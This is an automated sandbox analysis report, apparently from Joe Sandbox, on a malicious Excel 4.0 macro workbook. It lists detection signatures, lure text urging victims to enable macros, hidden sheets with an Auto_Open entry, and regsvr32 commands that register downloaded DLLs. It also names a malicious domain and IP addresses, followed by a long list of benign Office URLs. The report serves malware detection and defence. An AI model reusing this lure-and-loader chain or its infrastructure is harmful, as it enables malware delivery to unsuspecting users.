
Windows Analysis Report idea-22543577.xlsm

Overview

General Information

Sample Name: idea-22543577.xlsm
Analysis ID: 438634
MD5: 690a255b0f1b59b3421800bab8b41c10
SHA1: 1036eaadc0201b50d3d005ad05e208888021b945
SHA256: 2aba85eff52ce4b7d41b651baec98fea810a3307dc2b90bebf1c68131018cb0f

Detection

Hidden Macro 4.0
Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Excel documents contains an embedded macro which executes code when the document is opened
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6740 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • splwow64.exe (PID: 6916 cmdline: C:\Windows\splwow64.exe 12288 MD5: 8D59B31FF375059E3C32B17BF31A76D5)
    • regsvr32.exe (PID: 960 cmdline: regsvr32 ..\wail1.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 6340 cmdline: regsvr32 ..\wail2.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team | Data: Command: regsvr32 ..\wail1.dll, CommandLine: regsvr32 ..\wail1.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6740, ProcessCommandLine: regsvr32 ..\wail1.dll, ProcessId: 960

Signature Overview

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknown | HTTPS traffic detected: 108.167.165.249:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.100.155.169:443 -> 192.168.2.4:49740 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Section loaded: unknown origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe
Source: global traffic | DNS query: name: senderoalcielo.com
Source: global traffic | TCP traffic: 192.168.2.4:49738 -> 108.167.165.249:443
Source: global traffic | TCP traffic: 192.168.2.4:49738 -> 108.167.165.249:443
Source: Joe Sandbox View | IP Address: 5.100.155.169 5.100.155.169
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | DNS traffic detected: queries for: senderoalcielo.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://api.aadrm.com/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://api.addins.store.office.com/app/query
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://api.cortana.ai
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://api.diagnostics.office.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://api.diagnosticssdf.office.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://api.microsoftstream.com/api/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://api.office.net
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://api.onedrive.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://apis.live.net/v5.0/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://augloop.office.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://augloop.office.com/v2
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://autodiscover-s.outlook.com/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://cdn.entity.
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://clients.config.office.net/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://config.edge.skype.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://cortana.ai
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://cortana.ai/api
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://cr.office.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://dataservice.o365filtering.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://dataservice.o365filtering.com/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://dev.cortana.ai
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://devnull.onenote.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://directory.services.
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://entitlement.diagnostics.office.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://graph.ppe.windows.net
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://graph.ppe.windows.net/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://graph.windows.net
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://graph.windows.net/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://incidents.diagnostics.office.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://lifecycle.office.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://login.microsoftonline.com/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://login.windows.local
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://management.azure.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://management.azure.com/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://messaging.office.com/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://ncus.contentsync.
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://ncus.pagecontentsync.
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://officeapps.live.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://onedrive.live.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://onedrive.live.com/embed?
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://outlook.office.com/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://outlook.office365.com/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://pages.store.office.com/review/query
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://powerlift.acompli.net
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://settings.outlook.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://shell.suite.office.com:1443
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://skyapi.live.net/Activity/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://staging.cortana.ai
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://store.office.cn/addinstemplate
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://store.office.com/addinstemplate
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://store.office.de/addinstemplate
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://tasks.office.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://templatelogging.office.com/client/log
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://web.microsoftstream.com/video/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://webshell.suite.office.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://wus2.contentsync.
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://wus2.pagecontentsync.
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.dr | String found in binary or memory: https://www.odwebp.svc.ms
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown | HTTPS traffic detected: 108.167.165.249:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.100.155.169:443 -> 192.168.2.4:49740 version: TLS 1.2

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. W&~- - 15 / : 16 Pro
Source: Screenshot number: 4Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start 19 the decryption of the docum
Source: Screenshot number: 8Screenshot OCR: Enable editing" to unlock ti Make sure the bjnaryjs stored atthe specified path ordebug C it to ch
Source: Screenshot number: 8Screenshot OCR: Enable content" to perform 19 the decryption of the document. LSISJ 20 ' :: 0 SecurityWarning M
Source: Screenshot number: 12Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected View This fi
Source: Screenshot number: 12Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Document image extraction number: 0Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet. Protected View This fi
Source: Document image extraction number: 0Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Document image extraction number: 1Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 0 Protected View This
Source: Document image extraction number: 1Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: idea-22543577.xlsmInitial sample: CALL
Source: workbook.xmlBinary string: 1" sheetId="16" state="hidden" r:id="rId1"/><sheet name="Sheet" sheetId="17" r:id="rId2"/><sheet name="Sheet1" sheetId="4" r:id="rId3"/><sheet name="Sheet2" sheetId="12" r:id="rId4"/><sheet name="Sheet4" sheetId="10" state="hidden" r:id="rId5"/><sheet name="Sheet5" sheetId="11" state="hidden" r:id="rId6"/><sheet name="Sheet6" sheetId="15" state="hidden" r:id="rId7"/><sheet name="Sheet7" sheetId="14" state="hidden" r:id="rId8"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Sheet6!$AJ$9</definedName></definedNames><calcPr calcId="122211"/></workbook>
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: classification engineClassification label: mal64.expl.evad.winXLSM@7/9@2/2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{D4B42EE3-70BD-46E4-8A3E-29B11A1F2BF3} - OProcSessId.datJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\wail1.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\wail2.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\wail1.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\wail2.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: idea-22543577.xlsmInitial sample: OLE zip file path = xl/media/image1.png
Source: idea-22543577.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\wail1.dll
